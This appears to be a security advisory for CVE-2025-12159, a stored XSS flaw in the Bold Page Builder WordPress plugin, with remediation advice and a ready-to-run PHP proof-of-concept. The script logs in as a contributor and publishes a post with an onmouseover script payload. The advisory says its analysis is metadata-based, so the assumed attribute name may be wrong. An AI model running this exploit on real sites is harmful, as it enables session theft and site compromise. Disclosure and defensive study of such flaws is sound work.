Atomic Edge analysis of CVE-2025-12159 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Bold Page Builder WordPress plugin, affecting versions up to and including 5.4.8. The vulnerability resides in the plugin’s `bt_bb_raw_content` shortcode handler. Attackers with contributor-level or higher privileges can inject malicious scripts into page content, which then execute for any user viewing the compromised page. The CVSS score of 6.4 reflects a medium severity issue with scope change, indicating the attack can impact users beyond the targeted component.
Atomic Edge research indicates the root cause is insufficient input sanitization and output escaping on user-supplied shortcode attributes. The CWE-79 classification confirms this is a classic web page generation flaw. The vulnerability description explicitly names the `bt_bb_raw_content` shortcode as the vulnerable component. Without access to the source code diff, Atomic Edge analysis infers the plugin likely fails to properly sanitize attribute values before storing them in the database and/or fails to escape them when rendering the shortcode output on the front end. This inference is based on the CWE pattern and the specific mention of user-supplied attributes in the description.
Exploitation requires an authenticated user with at least the ‘contributor’ role. The attacker would create or edit a post or page, inserting the vulnerable shortcode with a malicious payload in one of its attributes. For example, they might use the WordPress editor to add `[bt_bb_raw_content custom_attribute=”alert(document.domain)”]`. When the page is saved and subsequently viewed by any user, the embedded JavaScript executes in the victim’s browser. The attack vector is the WordPress post editor interface where shortcodes are processed.
Effective remediation requires implementing proper input validation and output escaping. The plugin should sanitize all user-provided shortcode attribute values before storage, using functions like `sanitize_text_field()`. Additionally, the plugin must escape any dynamic output when rendering the shortcode on the front end, using functions like `esc_attr()` for attributes and `wp_kses_post()` for content. A patch would need to apply these security measures to the `bt_bb_raw_content` shortcode callback function.
Successful exploitation leads to stored XSS attacks. An attacker can steal session cookies, perform actions on behalf of authenticated users, deface websites, or redirect visitors to malicious sites. The ‘contributor’ access requirement limits immediate exploitation to trusted users, but this role is often granted to less-vetted individuals. The scope change (S:C in CVSS) means the injected script executes in the context of the vulnerable page, potentially affecting all site visitors and escalating the impact beyond a single user’s session.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-12159 - Bold Page Builder <= 5.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
<?php
/**
* Proof of Concept for CVE-2025-12159.
* This script simulates an authenticated contributor injecting a malicious shortcode into a post.
* Assumptions:
* 1. The target site has the Bold Page Builder plugin (<=5.4.8) active.
* 2. We have valid contributor-level credentials.
* 3. The site uses the standard WordPress login and post editing endpoints.
* 4. The `bt_bb_raw_content` shortcode accepts and unsafely outputs a 'custom_attribute'.
*/
$target_url = 'https://example.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_pass'; // CHANGE THIS
// Payload: XSS via a shortcode attribute.
$malicious_shortcode = '[bt_bb_raw_content custom_attribute="" onmouseover="alert(document.domain)" data-bt-bb=""]';
$post_title = 'Test Post with XSS';
$post_content = 'This post contains a malicious shortcode. ' . $malicious_shortcode;
// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
// Step 1: Authenticate and retrieve the nonce for creating a post.
$login_url = $target_url . '/wp-login.php';
$login_fields = http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_fields);
$response = curl_exec($ch);
// Check for login success by looking for the admin dashboard.
if (strpos($response, 'Dashboard') === false) {
die('Login failed. Check credentials.');
}
// Step 2: Get a nonce for the 'post' action from the admin area.
// Contributor users access /wp-admin/post-new.php.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);
// Extract the nonce for creating a post. This regex is a common pattern.
preg_match('/"_wpnonce" value="([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';
if (empty($nonce)) {
die('Could not retrieve nonce for post creation.');
}
// Step 3: Create a new post with the malicious shortcode.
$create_post_url = $target_url . '/wp-admin/post-new.php';
$post_fields = [
'post_title' => $post_title,
'content' => $post_content,
'publish' => 'Publish',
'_wpnonce' => $nonce,
'_wp_http_referer' => '/wp-admin/post-new.php',
'post_type' => 'post',
'post_status' => 'publish'
];
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$response = curl_exec($ch);
// Check for success.
if (strpos($response, 'Post published') !== false || strpos($response, 'Post updated') !== false) {
echo "Potential exploit successful. A post containing the malicious shortcode was published.n";
echo "Visit the post on the front end and hover over the shortcode output to trigger the XSS.n";
} else {
echo "Post creation may have failed. Check user permissions (contributor posts require review).n";
}
curl_close($ch);
?>
